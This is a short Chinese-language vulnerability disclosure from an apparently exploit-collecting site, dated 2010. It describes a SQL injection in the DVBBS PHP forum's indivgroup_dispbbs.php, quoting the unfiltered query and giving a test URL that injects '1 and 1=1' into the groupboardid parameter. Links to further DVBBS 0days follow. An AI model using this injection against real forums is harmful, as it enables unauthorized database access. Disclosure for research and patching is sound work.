动网PHP论坛indivgroup_dispbbs.php sql注入漏洞

2010, October 9, 10:07 AM. oday收藏
Submitted by admin
动网(DVBBS)论坛系统是一个采用PHP和MYSQL的数据架构的高性能网站论坛解决方案。
在文件indivgroup_dispbbs.php中:
if($groupboardid == 0){   //第86行
……
else{   //第92行
       $query=$db->query("select id boardid,rootid,boardname boardtype,boardinfo,indeximg,postnum,topicnum,todaynum,lastpost,boardstats,rules from {$dv}group_board where rootid={$groupid} and id={$groupboardid}");
变量$groupboardid没有经过过滤放入sql语句导致注入漏洞的产生。

测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
http://ssvdb.com/indivgroup_dispbbs.php?groupid=1&groupboardid=1%20and%201=1&id=2&page=1
测试可用。。。
Tags: 动网, dvbbs

« 上一篇 | 下一篇 »

只显示10条记录相关文章
dvbbs php2.0 几处0day (浏览: 12390, 评论: 0)
最新DVBBS8.0以上版本后台提升webshell 0day (浏览: 11758, 评论: 0)
动网多个版本上传漏洞 (浏览: 15962, 评论: 0)
dvbbs 8.2前台0day (浏览: 17246, 评论: 0)
动网博客又一Injection (影响:Dvbbs blog) (浏览: 10434, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):